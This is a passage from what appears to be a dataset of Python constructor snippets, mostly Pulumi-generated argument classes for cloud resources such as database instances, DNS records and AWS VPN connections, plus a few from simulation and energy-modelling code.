Optional[pulumi.Input[Mapping[str, Any]]] = None,\n builtin: Optional[pulumi.Input[bool]] = None,\n checksum: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n external_id: Optional[pulumi.Input[str]] = None,\n labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n ui_url: Optional[pulumi.Input[str]] = None,\n url: Optional[pulumi.Input[str]] = None,\n whitelist_domains: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):\n if active is not None:\n pulumi.set(__self__, \"active\", active)\n if annotations is not None:\n pulumi.set(__self__, \"annotations\", annotations)\n if builtin is not None:\n pulumi.set(__self__, \"builtin\", builtin)\n if checksum is not None:\n pulumi.set(__self__, \"checksum\", checksum)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if external_id is not None:\n pulumi.set(__self__, \"external_id\", external_id)\n if labels is not None:\n pulumi.set(__self__, \"labels\", labels)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if ui_url is not None:\n pulumi.set(__self__, \"ui_url\", ui_url)\n if url is not None:\n pulumi.set(__self__, \"url\", url)\n if whitelist_domains is not None:\n pulumi.set(__self__, \"whitelist_domains\", whitelist_domains)", "def __init__(__self__, *,\n connection_string: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n instance_series: Optional[pulumi.Input[str]] = None,\n mysql_version: Optional[pulumi.Input[int]] = None,\n port: Optional[pulumi.Input[str]] = None,\n specification: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None):\n if connection_string is not None:\n pulumi.set(__self__, \"connection_string\", connection_string)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if instance_charge_type is not None:\n pulumi.set(__self__, \"instance_charge_type\", instance_charge_type)\n if instance_series is not None:\n pulumi.set(__self__, \"instance_series\", instance_series)\n if mysql_version is not None:\n pulumi.set(__self__, \"mysql_version\", mysql_version)\n if port is not None:\n pulumi.set(__self__, \"port\", port)\n if specification is not None:\n pulumi.set(__self__, \"specification\", specification)\n if vpc_id is not None:\n pulumi.set(__self__, 
\"vpc_id\", vpc_id)\n if vswitch_id is not None:\n pulumi.set(__self__, \"vswitch_id\", vswitch_id)\n if zone_id is not None:\n pulumi.set(__self__, \"zone_id\", zone_id)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n instance_series: Optional[pulumi.Input[str]] = None,\n mysql_version: Optional[pulumi.Input[int]] = None,\n specification: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None,\n priority: Optional[pulumi.Input[str]] = None,\n qualified_name: Optional[pulumi.Input[str]] = None,\n ttl: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n value: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None,\n zone_name: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if priority is not None:\n pulumi.set(__self__, \"priority\", priority)\n if qualified_name is not None:\n pulumi.set(__self__, \"qualified_name\", qualified_name)\n if ttl is not None:\n pulumi.set(__self__, \"ttl\", ttl)\n if type is not None:\n pulumi.set(__self__, \"type\", type)\n if value is not None:\n pulumi.set(__self__, \"value\", value)\n if zone_id is not None:\n pulumi.set(__self__, \"zone_id\", zone_id)\n if zone_name is not None:\n pulumi.set(__self__, \"zone_name\", zone_name)", "def __init__(__self__, *,\n active: pulumi.Input[bool],\n builtin: pulumi.Input[bool],\n url: pulumi.Input[str],\n annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n checksum: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n external_id: Optional[pulumi.Input[str]] = None,\n labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n ui_url: Optional[pulumi.Input[str]] = None,\n whitelist_domains: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"active\", active)\n pulumi.set(__self__, \"builtin\", builtin)\n pulumi.set(__self__, \"url\", url)\n if annotations is not None:\n pulumi.set(__self__, \"annotations\", annotations)\n if checksum is not None:\n pulumi.set(__self__, \"checksum\", checksum)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if external_id is not None:\n pulumi.set(__self__, \"external_id\", external_id)\n if labels is not None:\n pulumi.set(__self__, \"labels\", labels)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if ui_url is not None:\n pulumi.set(__self__, \"ui_url\", ui_url)\n if whitelist_domains is not None:\n pulumi.set(__self__, \"whitelist_domains\", whitelist_domains)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n endpoint_type: Optional[pulumi.Input[str]] = None,\n entry: Optional[pulumi.Input[str]] = None,\n instance_id: Optional[pulumi.Input[str]] = None,\n module_name: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n minimum_engine_version: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n name_prefix: 
Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n user_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if minimum_engine_version is not None:\n pulumi.set(__self__, \"minimum_engine_version\", minimum_engine_version)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if name_prefix is not None:\n pulumi.set(__self__, \"name_prefix\", name_prefix)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if user_names is not None:\n pulumi.set(__self__, \"user_names\", user_names)", "def __init__(__self__,\n resource_name: str,\n args: Optional[InstanceArgs] = None,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__, *,\n app_name: Optional[pulumi.Input[str]] = None,\n bundle_id: Optional[pulumi.Input[str]] = None,\n encoded_icon: Optional[pulumi.Input[str]] = None,\n industry_id: Optional[pulumi.Input[str]] = None,\n package_name: Optional[pulumi.Input[str]] = None,\n product_id: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None):\n if app_name is not None:\n pulumi.set(__self__, \"app_name\", app_name)\n if bundle_id is not None:\n pulumi.set(__self__, \"bundle_id\", bundle_id)\n if encoded_icon is not None:\n pulumi.set(__self__, \"encoded_icon\", encoded_icon)\n if industry_id is not None:\n pulumi.set(__self__, \"industry_id\", industry_id)\n if package_name is not None:\n pulumi.set(__self__, \"package_name\", package_name)\n if product_id is not None:\n pulumi.set(__self__, \"product_id\", product_id)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def __init__(__self__, *,\n availability_zone: Optional[pulumi.Input[str]] = None,\n connection_string: Optional[pulumi.Input[str]] = None,\n create_sample_data: Optional[pulumi.Input[bool]] = None,\n db_instance_category: Optional[pulumi.Input[str]] = None,\n db_instance_class: Optional[pulumi.Input[str]] = None,\n db_instance_mode: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n encryption_key: Optional[pulumi.Input[str]] = None,\n encryption_type: Optional[pulumi.Input[str]] = None,\n engine: Optional[pulumi.Input[str]] = None,\n engine_version: Optional[pulumi.Input[str]] = None,\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n instance_group_count: Optional[pulumi.Input[int]] = None,\n instance_network_type: Optional[pulumi.Input[str]] = None,\n instance_spec: Optional[pulumi.Input[str]] = None,\n ip_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceIpWhitelistArgs']]]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n master_node_num: Optional[pulumi.Input[int]] = None,\n payment_type: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[str]] = None,\n port: Optional[pulumi.Input[str]] = None,\n private_ip_address: Optional[pulumi.Input[str]] = None,\n resource_group_id: Optional[pulumi.Input[str]] = None,\n security_ip_lists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n seg_node_num: Optional[pulumi.Input[int]] = None,\n seg_storage_type: Optional[pulumi.Input[str]] = None,\n ssl_enabled: Optional[pulumi.Input[int]] = None,\n status: Optional[pulumi.Input[str]] = None,\n 
storage_size: Optional[pulumi.Input[int]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n used_time: Optional[pulumi.Input[str]] = None,\n vector_configuration_status: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None):\n if availability_zone is not None:\n warnings.warn(\"\"\"Field 'availability_zone' has been deprecated from version 1.187.0. Use 'zone_id' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"availability_zone is deprecated: Field 'availability_zone' has been deprecated from version 1.187.0. Use 'zone_id' instead.\"\"\")\n if availability_zone is not None:\n pulumi.set(__self__, \"availability_zone\", availability_zone)\n if connection_string is not None:\n pulumi.set(__self__, \"connection_string\", connection_string)\n if create_sample_data is not None:\n pulumi.set(__self__, \"create_sample_data\", create_sample_data)\n if db_instance_category is not None:\n pulumi.set(__self__, \"db_instance_category\", db_instance_category)\n if db_instance_class is not None:\n pulumi.set(__self__, \"db_instance_class\", db_instance_class)\n if db_instance_mode is not None:\n pulumi.set(__self__, \"db_instance_mode\", db_instance_mode)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if encryption_key is not None:\n pulumi.set(__self__, \"encryption_key\", encryption_key)\n if encryption_type is not None:\n pulumi.set(__self__, \"encryption_type\", encryption_type)\n if engine is not None:\n pulumi.set(__self__, \"engine\", engine)\n if engine_version is not None:\n pulumi.set(__self__, \"engine_version\", engine_version)\n if instance_charge_type is not None:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n if instance_charge_type is not None:\n pulumi.set(__self__, \"instance_charge_type\", instance_charge_type)\n if instance_group_count is not None:\n pulumi.set(__self__, \"instance_group_count\", instance_group_count)\n if instance_network_type is not None:\n pulumi.set(__self__, \"instance_network_type\", instance_network_type)\n if instance_spec is not None:\n pulumi.set(__self__, \"instance_spec\", instance_spec)\n if ip_whitelists is not None:\n pulumi.set(__self__, \"ip_whitelists\", ip_whitelists)\n if maintain_end_time is not None:\n pulumi.set(__self__, \"maintain_end_time\", maintain_end_time)\n if maintain_start_time is not None:\n pulumi.set(__self__, \"maintain_start_time\", maintain_start_time)\n if master_node_num is not None:\n pulumi.set(__self__, \"master_node_num\", master_node_num)\n if payment_type is not None:\n pulumi.set(__self__, \"payment_type\", payment_type)\n if period is not None:\n pulumi.set(__self__, \"period\", period)\n if port is not None:\n pulumi.set(__self__, \"port\", port)\n if private_ip_address is not None:\n pulumi.set(__self__, \"private_ip_address\", private_ip_address)\n if resource_group_id is not None:\n pulumi.set(__self__, \"resource_group_id\", resource_group_id)\n if security_ip_lists is not None:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. 
Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\")\n if security_ip_lists is not None:\n pulumi.set(__self__, \"security_ip_lists\", security_ip_lists)\n if seg_node_num is not None:\n pulumi.set(__self__, \"seg_node_num\", seg_node_num)\n if seg_storage_type is not None:\n pulumi.set(__self__, \"seg_storage_type\", seg_storage_type)\n if ssl_enabled is not None:\n pulumi.set(__self__, \"ssl_enabled\", ssl_enabled)\n if status is not None:\n pulumi.set(__self__, \"status\", status)\n if storage_size is not None:\n pulumi.set(__self__, \"storage_size\", storage_size)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if used_time is not None:\n pulumi.set(__self__, \"used_time\", used_time)\n if vector_configuration_status is not None:\n pulumi.set(__self__, \"vector_configuration_status\", vector_configuration_status)\n if vpc_id is not None:\n pulumi.set(__self__, \"vpc_id\", vpc_id)\n if vswitch_id is not None:\n pulumi.set(__self__, \"vswitch_id\", vswitch_id)\n if zone_id is not None:\n pulumi.set(__self__, \"zone_id\", zone_id)", "def __init__(self, name, params):\n # create generic technology object\n DER.__init__(self, params['name'], 'ICE', params)\n # input params UNITS ARE COMMENTED TO THE RIGHT\n self.rated_power = params['rated_power'] # kW/generator\n self.p_min = params['min_power'] # kW/generator\n self.startup_time = params['startup_time'] # default value of 0, in units of minutes\n self.efficiency = params['efficiency'] # gal/kWh\n self.fuel_cost = params['fuel_cost'] # $/gal\n self.vari_om = params['variable_om_cost'] # $/kwh\n self.fixed_om = params['fixed_om_cost'] # $/yr\n self.capital_cost = params['ccost'] # $/generator\n self.ccost_kw = params['ccost_kW']\n\n self.variable_names = {'ice_gen', 'on_ice'}\n try:\n self.n = params['n'] # generators\n self.capex = self.capital_cost * self.n + self.ccost_kw * self.rated_power * self.n\n except KeyError:\n pass", "def __init__(self, name: str, ap_id: str, rac_config: RadioAccessNetworkConfiguration):\n super().__init__(name=name)\n\n self.simple = rac_config.bypass_amf # Simple A&C bypasses AMF\n\n # inputs/outputs to UEs\n self.input_access_request = Port(AccessRequest, 'input_access_request')\n self.input_disconnect_request = Port(DisconnectRequest, 'input_disconnect_request')\n self.input_rrc = Port(RadioResourceControl, 'input_rrc')\n self.input_ho_ready = Port(HandOverReady, 'input_ho_ready')\n self.input_ho_response = Port(HandOverResponse, 'input_ho_response')\n self.output_access_response = Port(AccessResponse, 'output_access_response')\n self.output_disconnect_response = Port(DisconnectResponse, 'output_disconnect_response')\n self.output_ho_started = Port(HandOverStarted, 'output_ho_started')\n self.output_ho_finished = Port(HandOverFinished, 'output_ho_finished')\n self.add_in_port(self.input_access_request)\n self.add_in_port(self.input_disconnect_request)\n self.add_in_port(self.input_rrc)\n self.add_in_port(self.input_ho_ready)\n self.add_in_port(self.input_ho_response)\n self.add_out_port(self.output_access_response)\n self.add_out_port(self.output_disconnect_response)\n self.add_out_port(self.output_ho_started)\n self.add_out_port(self.output_ho_finished)\n\n # inputs/outputs to APs\n self.input_start_ho_request = Port(StartHandOverRequest, 'input_start_ho_request')\n self.input_start_ho_response = Port(StartHandOverResponse, 
'input_start_ho_response')\n self.output_start_ho_request = Port(StartHandOverRequest, 'output_start_ho_request')\n self.output_start_ho_response = Port(StartHandOverResponse, 'output_start_ho_response')\n self.add_in_port(self.input_start_ho_request)\n self.add_in_port(self.input_start_ho_response)\n self.add_out_port(self.output_start_ho_request)\n self.add_out_port(self.output_start_ho_response)\n\n # inputs/outputs for core network\n if not self.simple:\n self.output_create_path_request = Port(CreatePathRequest, 'output_create_path_request')\n self.output_remove_path_request = Port(RemovePathRequest, 'output_remove_path_request')\n self.output_switch_path_request = Port(SwitchPathRequest, 'output_switch_path_request')\n self.input_create_path_response = Port(CreatePathResponse, 'input_create_path_response')\n self.input_remove_path_response = Port(RemovePathResponse, 'input_remove_path_response')\n self.input_switch_path_response = Port(SwitchPathResponse, 'input_switch_path_response')\n self.add_out_port(self.output_create_path_request)\n self.add_out_port(self.output_remove_path_request)\n self.add_out_port(self.output_switch_path_request)\n self.add_in_port(self.input_create_path_response)\n self.add_in_port(self.input_remove_path_response)\n self.add_in_port(self.input_switch_path_response)\n\n # AP internal inputs/outputs\n self.output_connected_ue_list = Port(EnableChannels, 'output_connected_ue_list')\n self.add_out_port(self.output_connected_ue_list)\n\n self.ap_id = ap_id # AP ID\n self.header = rac_config.header # Header for application packets\n self.ue_path = dict() # dictionary {UE ID: UE status}\n self.ue_to_ho_to = dict() # dictionary of connected_ap UE to be handed over {node_id: new_ap_id}\n self.ue_to_ho_from = dict() # dictionary of UE to be connected_ap via hand over {node_id: prev_ap_id}", "def __init__(self, name, direction, core):\n self.name = name\n self.direction = direction\n self.signals = {}\n self.core = core\n self.endpoints = []\n self.interface_type = None", "def __init__(__self__, *,\n distribution_type: pulumi.Input[str],\n instance_id: pulumi.Input[str],\n connection_prefix: Optional[pulumi.Input[str]] = None,\n max_delay_time: Optional[pulumi.Input[int]] = None,\n port: Optional[pulumi.Input[int]] = None,\n weight: Optional[pulumi.Input[Mapping[str, Any]]] = None):\n pulumi.set(__self__, \"distribution_type\", distribution_type)\n pulumi.set(__self__, \"instance_id\", instance_id)\n if connection_prefix is not None:\n pulumi.set(__self__, \"connection_prefix\", connection_prefix)\n if max_delay_time is not None:\n pulumi.set(__self__, \"max_delay_time\", max_delay_time)\n if port is not None:\n pulumi.set(__self__, \"port\", port)\n if weight is not None:\n pulumi.set(__self__, \"weight\", weight)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n interception_port: Optional[pulumi.Input[int]] = None,\n labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n location: Optional[pulumi.Input[str]] = None,\n mesh_id: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n core_network_arn: Optional[pulumi.Input[str]] = None,\n core_network_attachment_arn: Optional[pulumi.Input[str]] = None,\n customer_gateway_configuration: Optional[pulumi.Input[str]] = None,\n 
customer_gateway_id: Optional[pulumi.Input[str]] = None,\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n routes: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionRouteArgs']]]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_address: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel1_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input['VpnConnectionTunnel1LogOptionsArgs']] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel1_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_address: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel2_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input['VpnConnectionTunnel2LogOptionsArgs']] = 
None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n vgw_telemetries: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionVgwTelemetryArgs']]]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if core_network_arn is not None:\n pulumi.set(__self__, \"core_network_arn\", core_network_arn)\n if core_network_attachment_arn is not None:\n pulumi.set(__self__, \"core_network_attachment_arn\", core_network_attachment_arn)\n if customer_gateway_configuration is not None:\n pulumi.set(__self__, \"customer_gateway_configuration\", customer_gateway_configuration)\n if customer_gateway_id is not None:\n pulumi.set(__self__, \"customer_gateway_id\", customer_gateway_id)\n if enable_acceleration is not None:\n pulumi.set(__self__, \"enable_acceleration\", enable_acceleration)\n if local_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv4_network_cidr\", local_ipv4_network_cidr)\n if local_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv6_network_cidr\", local_ipv6_network_cidr)\n if outside_ip_address_type is not None:\n pulumi.set(__self__, \"outside_ip_address_type\", outside_ip_address_type)\n if remote_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv4_network_cidr\", remote_ipv4_network_cidr)\n if remote_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv6_network_cidr\", remote_ipv6_network_cidr)\n if routes is not None:\n pulumi.set(__self__, \"routes\", routes)\n if static_routes_only is not None:\n pulumi.set(__self__, \"static_routes_only\", static_routes_only)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transit_gateway_attachment_id\", transit_gateway_attachment_id)\n if transit_gateway_id is not None:\n pulumi.set(__self__, \"transit_gateway_id\", transit_gateway_id)\n if transport_transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transport_transit_gateway_attachment_id\", transport_transit_gateway_attachment_id)\n if tunnel1_address is not None:\n pulumi.set(__self__, \"tunnel1_address\", tunnel1_address)\n if tunnel1_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel1_bgp_asn\", tunnel1_bgp_asn)\n 
if tunnel1_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel1_bgp_holdtime\", tunnel1_bgp_holdtime)\n if tunnel1_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_cgw_inside_address\", tunnel1_cgw_inside_address)\n if tunnel1_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_action\", tunnel1_dpd_timeout_action)\n if tunnel1_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_seconds\", tunnel1_dpd_timeout_seconds)\n if tunnel1_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel1_enable_tunnel_lifecycle_control\", tunnel1_enable_tunnel_lifecycle_control)\n if tunnel1_ike_versions is not None:\n pulumi.set(__self__, \"tunnel1_ike_versions\", tunnel1_ike_versions)\n if tunnel1_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_cidr\", tunnel1_inside_cidr)\n if tunnel1_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_ipv6_cidr\", tunnel1_inside_ipv6_cidr)\n if tunnel1_log_options is not None:\n pulumi.set(__self__, \"tunnel1_log_options\", tunnel1_log_options)\n if tunnel1_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase1_dh_group_numbers\", tunnel1_phase1_dh_group_numbers)\n if tunnel1_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_encryption_algorithms\", tunnel1_phase1_encryption_algorithms)\n if tunnel1_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_integrity_algorithms\", tunnel1_phase1_integrity_algorithms)\n if tunnel1_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase1_lifetime_seconds\", tunnel1_phase1_lifetime_seconds)\n if tunnel1_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase2_dh_group_numbers\", tunnel1_phase2_dh_group_numbers)\n if tunnel1_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_encryption_algorithms\", tunnel1_phase2_encryption_algorithms)\n if tunnel1_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_integrity_algorithms\", tunnel1_phase2_integrity_algorithms)\n if tunnel1_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase2_lifetime_seconds\", tunnel1_phase2_lifetime_seconds)\n if tunnel1_preshared_key is not None:\n pulumi.set(__self__, \"tunnel1_preshared_key\", tunnel1_preshared_key)\n if tunnel1_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel1_rekey_fuzz_percentage\", tunnel1_rekey_fuzz_percentage)\n if tunnel1_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel1_rekey_margin_time_seconds\", tunnel1_rekey_margin_time_seconds)\n if tunnel1_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel1_replay_window_size\", tunnel1_replay_window_size)\n if tunnel1_startup_action is not None:\n pulumi.set(__self__, \"tunnel1_startup_action\", tunnel1_startup_action)\n if tunnel1_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_vgw_inside_address\", tunnel1_vgw_inside_address)\n if tunnel2_address is not None:\n pulumi.set(__self__, \"tunnel2_address\", tunnel2_address)\n if tunnel2_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel2_bgp_asn\", tunnel2_bgp_asn)\n if tunnel2_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel2_bgp_holdtime\", tunnel2_bgp_holdtime)\n if tunnel2_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_cgw_inside_address\", tunnel2_cgw_inside_address)\n if tunnel2_dpd_timeout_action is not None:\n 
